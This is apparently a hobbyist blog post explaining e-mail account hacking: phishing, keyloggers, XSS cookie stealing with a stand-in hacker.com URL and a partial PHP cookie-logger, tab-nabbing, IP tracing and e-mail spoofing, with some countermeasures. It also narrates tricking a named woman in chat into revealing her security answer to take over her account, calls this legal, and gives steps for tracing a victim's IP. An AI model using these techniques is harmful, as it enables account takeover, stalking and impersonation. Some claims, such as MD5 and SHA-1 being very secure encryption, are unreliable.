Email Hacking explained - The Logical Kid

E-MAIL HACKING:

what is e-mail hacking ?

You might have heard, people often complain that their e-mail id was hacked, and they have NO idea how that happened!
Well, the reasons are quite a few though!
There are only a few direct ways to hack any e-mail id.
As far as authentic HACKING of any e-mail id is concerned, that can be done ONLY by accessing the target’s e-mail server and grabbing the password from the database.

Seems simple?
Anyways, in real-time .. you just got to be kidding if you go hack a mail server just for getting some person’s e-mail id’s password.
Even if you manage to get into the server, provided I assume that you also have access to the database, then?
Negative! Even then.. cracking password won’t be a cakewalk, as the passwords will be thoroughly encrypted using some very secure algorithms like MD5,SHA-1, or private encryptions!
You might have heard some security conscious techies always advising on using a strong password!
Strong password? What is that?
Yes! A strong password is the one which contains a combination of lowercase, uppercase characters and also special symbols and having the string length greater than 12 characters!
Trust me, this is the ONLY legitimate method of hacking any e-mail id.
Now, you do know that hacking any e-mail id using this so-called method is easier said than done!

Q:Yes I got you.. but how do people still hack e-mail id(s)? 
A: The basic concept of hacking e-mail id(s) is.. hacking a user’s mind!
In case of e-mail hacking, this holds right.. as NOBODY uses the direct method of hacking!
So, how do people hack? This is proven here, that hackers use INDIRECT methods to hack your accounts!
Some of the most common methods are as follows:
  • Phishing
  • Keylogging
  • Session Hijacking by Cookie stealing
  • Tab nabbing
  • Social Engineering

More stuff with e-mail?


  • e-mail tracing
  • e-mail spoofing
I am going to explain the concepts of the above specified methods of hacking any online account, and here I am going to stress on how they are used in e-mail hacking.




Phishing:

Phishing is the method of hacking in which the attacker/hacker creates a mirror page of the legitimate page of any website, and fools the user in making him think that it is the original website! When the user provides his/her credentials at that fake page, the credentials are logged in at the hacker’s server, and then the user is re-directed to the genuine page with an“incorrect id/password” error which doesn’t even sound fishy to him!
He simply enters back the credentials, and lo! … he will be successfully logged into his account!
So far so good!
Now, do you think that the victim had even any idea of what just happened with him? No! He obviously would’nt mind giving a shot to his mind to think why he couldn’t login in the first attempt!
Human psychology, it is! We often take things for granted, and overlook many events!
This vulnerability in human mind is exploited by this method of phishing!

Countermeasure(s) of Phishing:

  1. Never provide your credentials on any website which is NOT the legitimate website!
    Example: Never provide your credentials of yahoo! at any other site which is not owned by yahoo!
    Genuine yahoo! link: http://www.yahoo.com
    Example sub-domain: http://mail.yahoo.com
                 http://xyz.yahoo.com




Keylogging:

Keylogging is the method of hacking in which the hacker logs in all the keystrokes of the target’s system. This is done by sending a keylogger [program/software] to the target user via e-mail, or binded to a genuine application, and when the user runs the seemingly genuine application, the keylogger engine starts in background, hidden from TaskManager and sends the keystroke logs to the hacker via pre-configured e-mail method of delivery or direct uploading on the hacker’s ftp server.
Now, if the user enters his e-mail username and password while the keylogger is running, his credentials will reach the attacker’s machine in plain text in a well decorated manner! (sorted HTML report)  Some most common softwares used in this module:
  • Ardamax Keylogger
  • BlazingTools Perfect Keylogger

Countermeasure(s) of Keylogging:

  • Use ‘on-screen keyboard’ (Virtual keyboard in Windows Operating System)
    [start > All Programs > Accessories > Ease of Access > On-Screen Keyboard]
  • Use a good Anti-Spyware




Session Hijacking by Cookie Stealing:

Cookie(s) is/are data which basically are used by websites to identify if the user is logged in!
Stealing cookies, is the method of hacking in which the attacker carefully crafts a URL with a cookie stealing script and asks the target to go to that site.
When the innocent user goes to that url, the script captures his cookies of the site from where he jumped to this malicious site!
The attacker then uses cookie-editors to morph/forge his cookies with those of the user, which results in session hijacking!
Session hijacking is the act of hijacking a user’s session as it is, with a limitation wherein he cannot be able to change the password of the hijacked user’s account!
Anyways, this concept holds good in e-mail hacking too!
The attacker can play with the victim’s e-mail id, with the ONLY major limitation of not being able to change the password!
Basically, an attacker uses the concept of XSS (Cross Site Scripting) here, to get his job done!
Example:
http://www.genuinesite.com/index.php?site=www.hacker.com/stealcookie.php

The example code of a cookie stealer in PHP looks something like this:

<?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('file.txt', 'a');

fwrite($fp, 'Cookie: '.$cookie.'

IP: ' .$ip. '

Date and Time: ' .$date.
?>

Countermeasure(s) of Cookie Stealing:

  • Never click on any suspicious link, even if it appears to have come from a genuine source.
    Remember, TRUST is.. a weakness! If curiosity bothers you, open the link in a private/incognito window.
  • Use a good Internet Security Suite, like the one provided by Kaspersky Labs.




Tab nabbing:

Ever wondered that you logged into some page of a site, and moved to other tab of your browser for some work.. and when you come back to the previous tab, you find that its a different page !?
Experienced such an activity? Thinking that twas just a hallucination? No! Probably you were a victim of tab-nabbing type of attack and you never noticed!  Yes! This particular scenario of attack is called Tab-Nabbing (Logically, a catennation of the words ‘tab’ [as in browser] & ‘nab’ [as in grab]).
The process is called Tab-nabbing!
The concept involved in this is that an attacker posts a JavaScript with tags like &ltbody OnLoad&gt which tends to load a new page in the same window after a period of time.
So, when we switch to some other tab, and return after some time to the previous tab, we may find that the page is different from the one we had left open!

Countermeasure(s) of tab nabbing:

  • Think no further, just close the tab (or) re-enter the genuine URL of the page you want and provide your credentials there!
  • To prevent such attacks, some websites log you off the session when found inactive for 15 minutes or so, so that any malicious tab-nabbing script may not bother you!
Lets move on to hacking without any tools!
Hacking without any tools, or let me say just by using some communication skills.. is also possible!
As far as the success rate is concerned, this is very successful and the best part is, it is not illegal!  Yes! I am talking about Social Engineering.




Social Engineering:

Social engineering is the art of hacking by just using our communication skills!
Don’t get it? Uhm.. okay, let me explain it in a generalised way!

Scenario:

I happened to try some user Maya’s e-mail account hacking via password recovery process using secret questions.
Her first question was “Where were you born?” and I could crack this question by her facebook profile where she had put her hometown as ‘Nagpur’. Bingo! This worked out!
Now, I just needed to answer one more question and I would be then asked to enter a new password, and that would be a successful hack!
Coming towards the second question, .. well this was kind of difficult to me, as it was “What was my first pet’s name?”
I didn’t know Maya personally, so cracking this question was a bit difficult for me.
After looking at her facebook profile for long, checking the ‘pages’,'interests’ & ‘activities’ she LIKED I couldn’t get positive results, as I only did know that she had a dog.. by some mutual friend.
What was the dog’s name.. is what remained a question for me though!
I did just started a facebook chat with Maya, asked her some general questions, the trimmed conversation was something like the one below:
Me: How are you! Long time no chat!?
Maya: Hi! I’m fine! How are you??
Me: [blah...blah..blah, and after getting comfortable at a level, threw a question to her] “You love animals a lot rite?” 
Maya: Yes! I love them a lot! <3

Now I thought it was a good moment to shoot a question asking her dog’s name,
and I just asked, “Hey.. can you tell me the price of a labrador these days?” to which she replied:
“Its around 12-15 thousand!”
Me: Wow! Thats cool! How much was your lab? :)
Maya: My Sandy was 10k when we bought it! :)

Voila! I got the name of her labrador! :D
Next is what.. I just entered ‘Sandy’ as an answer to the second security question, and bingo! This was the right answer! :D
I gave a new password, and then the process of HACKING was complete!
Was it any harder? Obviously NO! ;)
Well, this was just one scenario… but the concept is same in all Social Engineering attacks! The human nature of TRUSTING anyone and everyone and disclosing personal information, is eXploited in this particular module of attack!




e-mail tracing:

Have you ever heard that people trace your IP via e-mail?
Yes! This happens! This can be done by checking the e-mail headers of the e-mail received.
Anyways, if we purposefully want to capture the IP a person ..we can send a carefully crafted javascript coding embedded in the e-mail content, which holds the script to capture the IP address of the person opening it!
There are also some sites which offer this service, without the need of sender to embed the IP-capture script!
Sites like mailtracking[dot]com and statcounter[dot]com offer us IP-tracing service(s) for free!

Steps to trace the IP of a yahoo mail user using mailtracking[dot]com:

  1. Create an account at mailtracking[dot]com in association with yahoo[dot]com
  2. Log into your yahoo! mail account
  3. Click on ‘compose’
  4. Write some content & move to the ‘send to’ field
  5. enter victim@yahoo.com.mailtracking.com
  6. When the user with e-mail id victim@yahoo.com opens the mail we just sent him, we will get a notification on our yahoo! mail containing the IP-address of the victim and many more details.. like his Operating System,browser,etc.

Currently these services are being bounced by yahoo and gmail, but anyways you may try using the "embed pixel" option offered on the above website to counter for the same.




Anonymous e-mail (and/or) e-mail spoofing:

Sometimes you want to send a mail to anyone but do not want to be traced? The solution is simple!
This can be done by the concept of anonymous e-mailing. You can send an anonymous e-mail using an smtp server of your own, like ‘hMailServer’ , ‘smtpserverwin’ and many more software available for free download!
Anyways, you can easily use the online service too which is far easier than manually setting up your own smtp server.
Some of the most common anonymous e-mail sending services are offered by:
  1. fakesend[dot]com
  2. fakemailgenerator[dot]com
  3. sendanonymousemail[dot]net
  4. deadfake[dot]com/send.aspx
  5. mail[dot]anonymizer[dot]name
Well, the above websites give you liberty to send anonymous and/or spoofed mail to any e-mail account!
You can even send as ‘billgates@microsoft.com’ ;)
Now, suppose if you want to dispose off your mail id to prevent tracking, you have many other sites which provide this specific service:
  1. 10minutemail[dot]com
  2. mailinator[dot]com
  3. tittbit[dot]in
  4. guerillamail[dot]com
  5. mytrashmail[dot]com
  6. yopmail[dot]com
The concept is simple. They provide you a temporary e-mail account which automatically disposes off after a period of time, say 10 minutes or an hour, or even one day!
These e-mail services can be used when you need to specify an e-mail id for receiving a download link of any software!
People, most of the wannabe hackers think that hacking is a MAGIC! But wait.. NO! This isn’t any magic. This is purely based on logic! If you want to become a hacker, just remove all false thoughts in your mind about hacking that it is all magic.. et al!
Work towards the concept of each module, and understand the logic better! :)
Thats all folks!
Will come up with much more stuff like this in next post! Until then, stay safe.. and happy hacking!

- itsmeRiF